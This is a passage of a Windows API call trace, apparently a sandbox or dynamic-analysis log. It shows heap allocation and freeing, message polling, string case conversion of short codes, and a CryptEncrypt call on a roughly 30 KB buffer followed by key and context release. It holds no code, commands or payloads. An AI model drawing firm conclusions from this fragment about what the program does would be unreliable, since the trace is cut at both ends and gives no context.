dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c6638 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.814] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x75ee, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x75f0) returned 1 [0257.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.814] CharLowerBuffW (in: lpsz="byte[30192]", cchLength=0xb | out: lpsz="byte[30192]") returned 0xb [0257.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.815] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.815] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.815] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.815] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.815] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.815] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.815] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c6638*, pdwDataLen=0x8bef68*=0x75ee, dwBufLen=0x75f0 | out: pbData=0x24c6638*, pdwDataLen=0x8bef68*=0x75f0) returned 1 [0257.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.816] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.816] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.816] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.816] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.816] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.816] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.817] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.817] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.817] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.817] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.817] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.817] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.817] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.817] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.817] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.817] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.817] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.817] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.817] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.817] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.819] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.819] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.819] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.820] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.820] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.820] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0257.820] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.821] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0257.821] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.821] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.821] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.821] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.821] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.821] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.821] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.821] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0257.821] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.826] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.826] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.826] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.826] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.826] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.826] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.826] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.826] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.827] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.827] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.827] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.827] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.827] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.828] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.828] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.828] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.828] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.828] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.828] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.828] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.828] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.828] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.828] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.829] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.829] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.829] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.829] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.829] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.830] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.830] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.830] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.830] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0257.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0257.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0257.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, 